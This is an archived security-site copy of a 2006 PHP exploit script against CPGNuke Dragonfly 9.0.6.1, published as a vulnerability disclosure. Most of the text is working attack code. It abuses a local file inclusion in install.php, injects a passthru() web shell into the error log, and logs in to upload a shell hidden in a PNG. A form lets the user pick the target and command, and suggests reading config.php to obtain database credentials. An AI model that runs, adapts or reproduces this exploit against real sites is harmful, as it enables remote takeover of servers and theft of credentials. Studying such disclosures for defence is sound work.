Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11354
HistoryFeb 09, 2006 - 12:00 a.m.

CPGNuke Dragonfly 9.0.6.1 remote commands execution through arbitrary local inclusion

2006-02-0900:00:00
vulners.com
7

<?php

—dragonfly9.0.6.1_incl_xpl.php 20.15 07/02/2006

CPGNuke Dragonfly 9.0.6.1 remote commands execution through arbitrary local

inclusion - (Sun-Tzu Drangonfly killing) -

coded by rgod

site: http://retrogod.altervista.org

-> this works regardless of magic_quotes_gpc settings

Sun-Tzu: "Thus it may be known that the leader of armies is the arbiter of

the people's fate, the man on whom it depends whether the nation shall be

in peace or in peril."

/*
a short explaination:
install.php is not deleted after dragonfly installation, you cannot use it
to modify settings but we have a local inclusion bug in it at lines 33-49:

...
if &#40;isset&#40;$_GET[&#39;newlang&#39;]&#41;&#41; {
      setcookie&#40;&#39;installlang&#39;,$_GET[&#39;newlang&#39;]&#41;;
       $currentlang = $_GET[&#39;newlang&#39;];
} elseif &#40;isset&#40;$_COOKIE[&#39;installlang&#39;]&#41;&#41; {
      $currentlang = $_COOKIE[&#39;installlang&#39;];
}
$instlang = array&#40;&#41;;
if &#40;file_exists&#40;&quot;install/language/$currentlang.php&quot;&#41;&#41; {
      require&#40;&quot;install/language/$currentlang.php&quot;&#41;;
} else {
       require&#40;&#39;install/language/english.php&#39;&#41;;
}
if &#40;file_exists&#40;&quot;language/$currentlang/main.php&quot;&#41;&#41; {
      require&#40;&quot;language/$currentlang/main.php&quot;&#41;;
} else {
      require&#40;&#39;language/english/main.php&#39;&#41;;
}
...

poc:
http://[target]/[path]/install.php?newlang=…/…/cpg_error.log%00

we are using backslashes and a null char, but this works with magic_quotes_gpc
both on and off because of dragonfly magic quotes disable code…

also you can do that through cookies…

GET /[PATH]/install.php HTTP/1.1
Cookie: installlang=…/…/cpg_error.log%00;
Host: [target]
Connection: Close

There are two ways to inject arbitrary code in dragonfly resources:

i) in cpg_error.log, poc:

http://[target]/[path]/error.php?<?passthru($_GET[cmd]);?>
http://[target]/[path]/install.php?cmd=ls%20-la&newlang=…/…/cpg_error.log%00

this works with $error_log = true in error.php (not the default)
some problems with spaces, converted as %20 so this way works with
allow_short_open_tag = On in php.ini

ii) uploading a malicious .png file in modules/coppermine/albums/userpics/
dir. We will search for a php[some hex values].tmp file, you have to supply
valid credentials with upload rights to do that…by default, any user can
upload

however you can try manually including some database file or Apache log… use
your imagination
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
ignore_user_abort(0);

echo'<html><head><title>CPGNuke Dragonfly 9.0.6.1 remote commands execution*
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} {text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}–></style></head><body><p class="Stile6">
CPGNuke Dragonfly 9.0.6.1 remote commands execution</p><p class="Stile6">a
script by rgod at <a href="http://retrogod.altervista.org"target="_blank">
http://retrogod.altervista.org</a></p><table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="'.$_SERVER[PHP_SELF].'"> <p><input
type="text" name="host"> <span class="Stile5">
target (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/cpgnuke/ or just / ) </span></p><p><input type="text" name="CMD"> <span
class="Stile5"> * specify a command ("cat config.php" to see database username &
password…)</span></p><p><input type="text" name="ULOGIN"><span class="Stile5">
a valid USER with upload rights for Coppermine (by default any…) </span></p>
<p><input type="text" name="USER_PASSWORD"><span class="Stile5"> … and PASSWOR
D, required for STEP 3 and following… </span> </p> <p> <input type="text"
name="port"><span class="Stile5">specify a port other than 80 (default value)
</span></p><p><input type="text" name="pRoXy"><span class="Stile5">send exploit
through an HTTP proxy (ip:port)</span></p><p> <input type="submit" name="Submit"
value="go!"></p></form></td></tr></table></body></html>';

function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$dAtAi=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++) {
echo "<td>".htmlentities($headeri[$li+$ki])."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($dAtAi)==1) {
echo "<td>0".htmlentities($dAtAi)."</td>";
}
else {
echo "<td>".htmlentities($dAtAi)."</td> ";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo "<td>".htmlentities($headeri[$li])."</td>";
}
echo "</tr></table>";
}

$pRoXy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //2x speed
{
global $pRoXy, $host, $port, $pAcKeT, $HtMl, $pRoXy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else {
$c = preg_match($pRoXy_regex,$pRoXy);
if (!$c) {echo 'Not a valid prozy…';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."…<br>";
if ($pRoXy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$pRoXy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy…<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$HtMl= '';
socket_write($socket, $pAcKeT, strlen($pAcKeT));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$HtMl.=$out;}
echo nl2br(htmlentities($HtMl));
echo "Closing socket…";
socket_close($socket);
}
}
}

function sendpacketii($pAcKeT,$show)
{
global $pRoXy, $host, $port, $HtMl, $pRoXy_regex;
if ($pRoXy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($pRoXy_regex,$pRoXy);
if (!$c) {
echo 'Not a valid prozy…';die;
}
$parts=explode(':',$pRoXy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy…<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy…';die;
}
}
fputs($ock,$pAcKeT);
if ($pRoXy=='') {
$HtMl='';
while (!feof($ock)) {
$HtMl.=fgets($ock);
}
}
else {
$HtMl='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$HtMl))) {
$HtMl.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($HtMl));
}

function refresh()
{
flush();
ob_flush();
usleep(100000);
}
$host=$_POST[host];$port=$_POST[port];
$path=$_POST[path];$CMD=$_POST[CMD];
$pRoXy=$_POST[pRoXy];$ULOGIN=$_POST[ULOGIN];
$USER_PASSWORD=$_POST[USER_PASSWORD];

if (($host<>'') and ($path<>'') and ($CMD<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error… check the path!');}
if ($pRoXy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
$CMD=urlencode($CMD);

# STEP 0 -&gt; look for a suntzu.tmp file &#40;checking if exploit has already succeeded...
$pAcKeT=&quot;GET &quot;.$p.&quot;suntzu.tmp HTTP/1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
show&#40;$pAcKeT&#41;;
sendpacketii&#40;$pAcKeT&#41;;
if &#40;eregi&#40;&quot;filename:&quot;,$HtMl&#41;&#41; {
         echo&#40;&quot;Exploit already launched and succeeded...Now launch desired command...&quot;&#41;;
         $temp=explode&#40;&quot;filename:&quot;,$HtMl&#41;;
         $temp2=explode&#40;&quot;.tmp&quot;,$temp[1]&#41;;
         $filename=$temp2[0].&quot;.tmp&quot;;
         $filepath=&quot;../../modules/coppermine/albums/userpics/&quot;.$filename.chr&#40;0x00&#41;;
         $filepath=urlencode&#40;$filepath&#41;;
         $pAcKeT=&quot;GET &quot;.$p.&quot;install.php?cmd=$CMD&amp;newlang=$filepath HTTP/1.1&#92;r&#92;n&quot;;
         $pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
         $pAcKeT.=&quot;User-Agent: GoogleBot 1.1&#92;r&#92;n&quot;;
         $pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
         show&#40;$pAcKeT&#41;;
         sendpacketii&#40;$pAcKeT&#41;;die;
                               }

# STEP 1 -&gt; try to inject a shell in cpg_error.log,
# this works with $error_log = true in error.php &#40;not the default&#41;
# some problems with spaces, converted as &#37;20 so this works with allow_short_open_tag on
$SHELL=&quot;&lt;?ob_clean&#40;&#41;;echo&#92;&quot;HiMaster!&#92;&quot;;ini_set&#40;&#92;&quot;max_execution_time&#92;&quot;,0&#41;;&quot;;
$SHELL.=&quot;passthru&#40;&#92;$HTTP_GET_VARS[cmd]&#41;;die;?&gt;&quot;;
$pAcKeT=&quot;GET &quot;.$p.&quot;error.php?$SHELL HTTP/1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;User-Agent: Gameboy, Powered by Nintendo&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
show&#40;$pAcKeT&#41;;
sendpacketii&#40;$pAcKeT&#41;;

# STEP 2 -&gt; Arbitrary local inclusion... launch commands
# install.php is still present after installation, it looses its functions
# when cpgnuke is already installed but we have an inclusion bug in it
$logfile=&quot;../../cpg_error.log&quot;.chr&#40;0x00&#41;;
$logfile=urlencode&#40;$logfile&#41;;
$pAcKeT=&quot;GET &quot;.$p.&quot;install.php?cmd=$CMD&amp;newlang=$logfile HTTP/1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;User-Agent: GoogleBot 1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
show&#40;$pAcKeT&#41;;
sendpacketii&#40;$pAcKeT&#41;;
if &#40;!eregi&#40;&quot;200 OK&quot;,$HtMl&#41;&#41; {die&#40;&quot;Can&#39;t find install.php on target server...&lt;br&gt;&quot;&#41;;}
if &#40;eregi&#40;&quot;HiMaster!&quot;,$HtMl&#41;&#41; {echo &quot;Exploit succeeded...&lt;br&gt;&quot;;die;}
                         else {echo &quot;STEP 2 failed..., trying STEP 3...&quot;;}

#STEP 3 -&gt; If STEP 2 failed, trying to upload a malicious .png file -&gt; firstly login to retrieve a

cookie
# and prepare an album to upload pictures in
if ($ULOGIN=="") {die("I need a valid username to launch STEP 3…");}
if ($USER_PASSWORD=="") {die("I need a valid username to launch STEP 3…");}

$COOKIE=&quot;CMSSESSID=db7ad9bfbbe33f543b52716742805ff7;&quot;;
$dAtA=&quot;------------wX253BHGef0yW2bSsgs8Po&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;ulogin&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=$ULOGIN.&quot;&#92;r&#92;n&quot;;
$dAtA.=&quot;------------wX253BHGef0yW2bSsgs8Po&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;user_password&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=$USER_PASSWORD.&quot;&#92;r&#92;n&quot;;
$dAtA.=&quot;------------wX253BHGef0yW2bSsgs8Po--&#92;r&#92;n&quot;;
$pAcKeT=&quot;POST &quot;.$p.&quot;index.php?name=coppermine&amp;file=albmgr&amp;cat=10002 HTTP/1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;User-Agent: Mag-Net&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Accept: */*&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Cookie: $COOKIE&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Content-Length: &quot;.strlen&#40;$dAtA&#41;.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Content-Type: multipart/form-data; boundary=----------wX253BHGef0yW2bSsgs8Po&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
$pAcKeT.=$dAtA;
show&#40;$pAcKeT&#41;;
sendpacketii&#40;$pAcKeT&#41;;
$temp=explode&#40;&quot;Set-Cookie: &quot;,$HtMl&#41;;
$temp2=explode&#40;&#39; &#39;,$temp[1]&#41;;
$cookie1=$temp2[0].&quot;path=/&quot;;
$temp2=explode&#40;&#39; &#39;,$temp[2]&#41;;
$cookie2=$temp2[0].&quot;path=/&quot;;
$temp2=explode&#40;&#39; &#39;,$temp[3]&#41;;
$cookie3=$temp2[0].&quot;path=/&quot;;
$COOKIE=$cookie1.$cookie2.$cookie3;
$COOKIE=str_replace&#40;&quot;path=/&quot;,&quot; &quot;,$COOKIE&#41;;
echo&#39;&lt;br&gt;cookie: -&gt; &#39;.htmlentities&#40;$COOKIE&#41;.&#39;&lt;br&gt;&lt;br&gt;&#39;;

$dAtA=&quot;------------tZ299BnwgKutccIBEFpGvM&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;cat&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;0&#92;r&#92;n&quot;;
$dAtA.=&quot;------------tZ299BnwgKutccIBEFpGvM&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;mode&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;addalb&#92;r&#92;n&quot;;
$dAtA.=&quot;------------tZ299BnwgKutccIBEFpGvM&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;title&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;SUNTZU&#92;r&#92;n&quot;;
$dAtA.=&quot;------------tZ299BnwgKutccIBEFpGvM--&#92;r&#92;n&quot;;
$pAcKeT=&quot;POST &quot;.$p.&quot;index.php?name=coppermine&amp;file=albmgr HTTP/1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;User-Agent: Suntzu preparing his shit&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Cookie: $COOKIE&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Content-Length: &quot;.strlen&#40;$dAtA&#41;.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Content-Type: multipart/form-data; boundary=----------tZ299BnwgKutccIBEFpGvM&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
$pAcKeT.=$dAtA;
show&#40;$pAcKeT&#41;;
sendpacketii&#40;$pAcKeT&#41;;

$pAcKeT=&quot;GET &quot;.$p.&quot;index.php?name=coppermine&amp;file=upload HTTP/1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;User-Agent: Suntzu looking is family photos&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Cookie: $COOKIE&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
show&#40;$pAcKeT&#41;;
sendpacketii&#40;$pAcKeT&#41;;
$temp=explode&#40;&quot;&#92;&quot;&gt;* SUNTZU&quot;,$HtMl&#41;;
$temp2=explode&#40;&quot;&#92;&quot;&quot;,$temp[0]&#41;;
$album=$temp2[count&#40;$temp2&#41;-1];
echo&#39;&lt;br&gt;album: -&gt; &#39;.htmlentities&#40;$album&#41;.&#39;&lt;br&gt;&lt;br&gt;&#39;;

# STEP 4 -&gt; Upload shell... this requires you have upload rights and GD library installed
# on target server... obviously if Coppermine works, GD is active

#the evil .png file, huge, but it works for me...
$SHELL=chr&#40;137&#41;.chr&#40;80&#41;. chr&#40;78&#41;. chr&#40;71&#41;. chr&#40;13&#41;. chr&#40;10&#41;. chr&#40;26&#41;. chr&#40;10&#41;.
       chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;13&#41;. chr&#40;73&#41;. chr&#40;72&#41;. chr&#40;68&#41;. chr&#40;82&#41;.
       chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;100&#41;.chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;100&#41;.
       chr&#40;8&#41;.  chr&#40;2&#41;.  chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;255&#41;.chr&#40;128&#41;.chr&#40;2&#41;.
       chr&#40;3&#41;.  chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;9&#41;.  chr&#40;112&#41;.chr&#40;72&#41;. chr&#40;89&#41;.
       chr&#40;115&#41;.chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;11&#41;. chr&#40;19&#41;. chr&#40;0&#41;.  chr&#40;0&#41;.  chr&#40;11&#41;.
       chr&#40;19&#41;. chr&#40;1&#41;.  chr&#40;0&#41;.  chr&#40;154&#41;.chr&#40;156&#41;.chr&#40;24&#41;. chr&#40;0&#41;.  chr&#40;0&#41;.
       chr&#40;12&#41;. chr&#40;38&#41;. chr&#40;73&#41;. chr&#40;68&#41;. chr&#40;65&#41;. chr&#40;84&#41;. chr&#40;120&#41;.chr&#40;156&#41;.
       chr&#40;221&#41;.chr&#40;93&#41;. chr&#40;203&#41;.chr&#40;118&#41;.chr&#40;236&#41;.chr&#40;54&#41;. chr&#40;12&#41;. chr&#40;163&#41;.
       chr&#40;206&#41;.chr&#40;241&#41;.chr&#40;47&#41;. chr&#40;118&#41;.chr&#40;215&#41;.chr&#40;117&#41;.chr&#40;255&#41;.chr&#40;255&#41;.
       chr&#40;15&#41;. chr&#40;216&#41;.chr&#40;133&#41;.chr&#40;45&#41;. chr&#40;17&#41;. chr&#40;36&#41;. chr&#40;65&#41;. chr&#40;73&#41;.
       chr&#40;246&#41;.chr&#40;120&#41;.chr&#40;114&#41;.chr&#40;211&#41;.chr&#40;178&#41;.chr&#40;189&#41;.chr&#40;25&#41;. chr&#40;91&#41;.
       chr&#40;47&#41;. chr&#40;75&#41;. chr&#40;8&#41;.  chr&#40;0&#41;.  chr&#40;83&#41;. chr&#40;206&#41;.chr&#40;76&#41;. chr&#40;210&#41;.
       chr&#40;254&#41;.chr&#40;254&#41;.chr&#40;231&#41;.chr&#40;175&#41;.chr&#40;214&#41;.chr&#40;154&#41;.chr&#40;136&#41;.chr&#40;180&#41;.
       chr&#40;43&#41;. chr&#40;198&#41;.chr&#40;225&#41;.chr&#40;121&#41;.chr&#40;32&#41;. chr&#40;77&#41;. chr&#40;154&#41;.chr&#40;196&#41;.
       chr&#40;211&#41;.chr&#40;244&#41;.chr&#40;159&#41;.chr&#40;200&#41;.chr&#40;104&#41;.chr&#40;32&#41;. chr&#40;98&#41;. chr&#40;7&#41;.
       chr&#40;189&#41;.chr&#40;82&#41;. chr&#40;198&#41;.chr&#40;89&#41;. chr&#40;63&#41;. chr&#40;190&#41;.chr&#40;94&#41;. chr&#40;123&#41;.
       chr&#40;123&#41;.chr&#40;139&#41;.chr&#40;84&#41;. chr&#40;224&#41;.chr&#40;67&#41;. chr&#40;69&#41;. chr&#40;207&#41;.chr&#40;23&#41;.
       chr&#40;90&#41;. chr&#40;162&#41;.chr&#40;118&#41;.chr&#40;6&#41;.  chr&#40;231&#41;.chr&#40;42&#41;. chr&#40;34&#41;. chr&#40;122&#41;.
       chr&#40;126&#41;.chr&#40;177&#41;.chr&#40;175&#41;.chr&#40;162&#41;.chr&#40;26&#41;. chr&#40;202&#41;.chr&#40;84&#41;. chr&#40;123&#41;.
       chr&#40;243&#41;.chr&#40;179&#41;.chr&#40;74&#41;. chr&#40;213&#41;.chr&#40;154&#41;.chr&#40;156&#41;.chr&#40;71&#41;. chr&#40;71&#41;.
       chr&#40;235&#41;.chr&#40;243&#41;.chr&#40;107&#41;.chr&#40;253&#41;.chr&#40;127&#41;.chr&#40;193&#41;.chr&#40;131&#41;.chr&#40;11&#41;.
       chr&#40;9&#41;.  chr&#40;249&#41;.chr&#40;45&#41;. chr&#40;96&#41;. chr&#40;125&#41;.chr&#40;43&#41;. chr&#40;148&#41;.chr&#40;30&#41;.
       chr&#40;134&#41;.chr&#40;56&#41;. chr&#40;2&#41;.  chr&#40;157&#41;.chr&#40;34&#41;. chr&#40;179&#41;.chr&#40;174&#41;.chr&#40;37&#41;.
       chr&#40;182&#41;.chr&#40;8&#41;.  chr&#40;226&#41;.chr&#40;244&#41;.chr&#40;107&#41;.chr&#40;117&#41;.chr&#40;234&#41;.chr&#40;193&#41;.
       chr&#40;18&#41;. chr&#40;121&#41;.chr&#40;5&#41;.  chr&#40;172&#41;.chr&#40;122&#41;.chr&#40;109&#41;.chr&#40;119&#41;.chr&#40;162&#41;.
       chr&#40;209&#41;.chr&#40;195&#41;.chr&#40;16&#41;. chr&#40;43&#41;. chr&#40;176&#41;.chr&#40;222&#41;.chr&#40;149&#41;.chr&#40;161&#41;.
       chr&#40;155&#41;.chr&#40;76&#41;. chr&#40;163&#41;.chr&#40;19&#41;. chr&#40;187&#41;.chr&#40;13&#41;. chr&#40;214&#41;.chr&#40;15&#41;.
       chr&#40;82&#41;. chr&#40;241&#41;.chr&#40;192&#41;.chr&#40;139&#41;.chr&#40;182&#41;.chr&#40;75&#41;. chr&#40;110&#41;.chr&#40;242&#41;.
       chr&#40;123&#41;.chr&#40;61&#41;. chr&#40;235&#41;.chr&#40;71&#41;. chr&#40;67&#41;. chr&#40;241&#41;.chr&#40;85&#41;. chr&#40;145&#41;.
       chr&#40;89&#41;. chr&#40;151&#41;.chr&#40;230&#41;.chr&#40;194&#41;.chr&#40;81&#41;. chr&#40;80&#41;. chr&#40;217&#41;.chr&#40;176&#41;.
       chr&#40;48&#41;. chr&#40;145&#41;.chr&#40;255&#41;.chr&#40;44&#41;. chr&#40;88&#41;. chr&#40;58&#41;. chr&#40;57&#41;. chr&#40;243&#41;.
       chr&#40;209&#41;.chr&#40;174&#41;.chr&#40;202&#41;.chr&#40;62&#41;. chr&#40;109&#41;.chr&#40;46&#41;. chr&#40;67&#41;. chr&#40;68&#41;.
       chr&#40;197&#41;.chr&#40;49&#41;. chr&#40;11&#41;. chr&#40;129&#41;.chr&#40;154&#41;.chr&#40;123&#41;.chr&#40;214&#41;.chr&#40;192&#41;.
       chr&#40;37&#41;. chr&#40;41&#41;. chr&#40;240&#41;.chr&#40;13&#41;. chr&#40;176&#41;.chr&#40;86&#41;. chr&#40;70&#41;. chr&#40;53&#41;.
       chr&#40;133&#41;.chr&#40;96&#41;. chr&#40;121&#41;.chr&#40;61&#41;. chr&#40;45&#41;. chr&#40;42&#41;. chr&#40;211&#41;.chr&#40;221&#41;.
       chr&#40;176&#41;.chr&#40;147&#41;.chr&#40;12&#41;. chr&#40;152&#41;.chr&#40;98&#41;. chr&#40;216&#41;.chr&#40;221&#41;.chr&#40;144&#41;.
       chr&#40;225&#41;.chr&#40;53&#41;. chr&#40;38&#41;. chr&#40;65&#41;. chr&#40;201&#41;.chr&#40;25&#41;. chr&#40;252&#41;.chr&#40;98&#41;.
       chr&#40;41&#41;. chr&#40;85&#41;. chr&#40;172&#41;.chr&#40;90&#41;. chr&#40;61&#41;. chr&#40;226&#41;.chr&#40;39&#41;. chr&#40;96&#41;.
       chr&#40;164&#41;.chr&#40;177&#41;.chr&#40;72&#41;. chr&#40;68&#41;. chr&#40;8&#41;.  chr&#40;179&#41;.chr&#40;68&#41;. chr&#40;192&#41;.
       chr&#40;187&#41;.chr&#40;64&#41;. chr&#40;134&#41;.chr&#40;145&#41;.chr&#40;63&#41;. chr&#40;255&#41;.chr&#40;3&#41;.  chr&#40;207&#41;.
       chr&#40;82&#41;. chr&#40;131&#41;.chr&#40;66&#41;. chr&#40;195&#41;.chr&#40;165&#41;.chr&#40;91&#41;. chr&#40;120&#41;.chr&#40;61&#41;.
       chr&#40;227&#41;.chr&#40;24&#41;. chr&#40;120&#41;.chr&#40;180&#41;.chr&#40;38&#41;. chr&#40;30&#41;. chr&#40;55&#41;. chr&#40;113&#41;.
       chr&#40;6&#41;.  chr&#40;127&#41;.chr&#40;53&#41;. chr&#40;113&#41;.chr&#40;2&#41;.  chr&#40;196&#41;.chr&#40;176&#41;.chr&#40;22&#41;.
       chr&#40;120&#41;.chr&#40;250&#41;.chr&#40;7&#41;.  chr&#40;192&#41;.chr&#40;42&#41;. chr&#40;20&#41;. chr&#40;72&#41;. chr&#40;18&#41;.
       chr&#40;41&#41;. chr&#40;184&#41;.chr&#40;248&#41;.chr&#40;226&#41;.chr&#40;170&#41;.chr&#40;42&#41;. chr&#40;151&#41;.chr&#40;193&#41;.
       chr&#40;119&#41;.chr&#40;141&#41;.chr&#40;97&#41;. chr&#40;15&#41;. chr&#40;184&#41;.chr&#40;45&#41;. chr&#40;118&#41;.chr&#40;253&#41;.
       chr&#40;173&#41;.chr&#40;100&#41;.chr&#40;232&#41;.chr&#40;71&#41;. chr&#40;104&#41;.chr&#40;97&#41;. chr&#40;68&#41;. chr&#40;230&#41;.
       chr&#40;89&#41;. chr&#40;97&#41;. chr&#40;190&#41;.chr&#40;123&#41;.chr&#40;211&#41;.chr&#40;230&#41;.chr&#40;11&#41;. chr&#40;89&#41;.
       chr&#40;15&#41;. chr&#40;160&#41;.chr&#40;132&#41;.chr&#40;54&#41;. chr&#40;139&#41;.chr&#40;129&#41;.chr&#40;250&#41;.chr&#40;54&#41;.
       chr&#40;64&#41;. chr&#40;134&#41;.chr&#40;247&#41;.chr&#40;30&#41;. chr&#40;173&#41;.chr&#40;243&#41;.chr&#40;198&#41;.chr&#40;25&#41;.
       chr&#40;124&#41;.chr&#40;208&#41;.chr&#40;219&#41;.chr&#40;253&#41;.chr&#40;187&#41;.chr&#40;161&#41;.chr&#40;248&#41;.chr&#40;3&#41;.
       chr&#40;230&#41;.chr&#40;89&#41;. chr&#40;5&#41;.  chr&#40;67&#41;. chr&#40;249&#41;.chr&#40;74&#41;. chr&#40;234&#41;.chr&#40;216&#41;.
       chr&#40;91&#41;. chr&#40;122&#41;.chr&#40;171&#41;.chr&#40;106&#41;.chr&#40;148&#41;.chr&#40;52&#41;. chr&#40;25&#41;. chr&#40;55&#41;.
       chr&#40;193&#41;.chr&#40;108&#41;.chr&#40;240&#41;.chr&#40;96&#41;. chr&#40;79&#41;. chr&#40;72&#41;. chr&#40;40&#41;. chr&#40;102&#41;.
       chr&#40;240&#41;.chr&#40;130&#41;.chr&#40;64&#41;. chr&#40;133&#41;.chr&#40;251&#41;.chr&#40;224&#41;.chr&#40;84&#41;. chr&#40;134&#41;.
       chr&#40;236&#41;.chr&#40;226&#41;.chr&#40;175&#41;.chr&#40;201&#41;.chr&#40;144&#41;.chr&#40;174&#41;.chr&#40;62&#41;. chr&#40;142&#41;.
       chr&#40;195&#41;.chr&#40;64&#41;. chr&#40;193&#41;.chr&#40;51&#41;. chr&#40;117&#41;.chr&#40;101&#41;.chr&#40;28&#41;. chr&#40;208&#41;.
       chr&#40;195&#41;.chr&#40;101&#41;.chr&#40;162&#41;.chr&#40;1&#41;.  chr&#40;171&#41;.chr&#40;193&#41;.chr&#40;177&#41;.chr&#40;134&#41;.
       chr&#40;88&#41;. chr&#40;100&#41;.chr&#40;94&#41;. chr&#40;13&#41;. chr&#40;224&#41;.chr&#40;2&#41;.  chr&#40;86&#41;. chr&#40;107&#41;.
